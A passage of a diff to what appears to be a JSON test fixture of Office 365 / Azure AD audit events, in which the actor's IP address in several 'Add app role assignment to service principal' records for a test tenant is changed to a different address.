\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9992570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795878\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"41c7d7a7-ce53-4696-aa78-37c451a95fe1\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9992570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795878\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"41c7d7a7-ce53-4696-aa78-37c451a95fe1\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -7156,9 +7156,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T18:26:05", "ExtendedProperties": [ { @@ -7392,7 +7392,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9242333Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795815\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"14f7e7eb-0fd1-4f89-bda8-642d035f3541\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9242333Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795815\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"14f7e7eb-0fd1-4f89-bda8-642d035f3541\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -7422,9 +7422,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T18:26:05", "ExtendedProperties": [ { @@ -7658,7 +7658,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 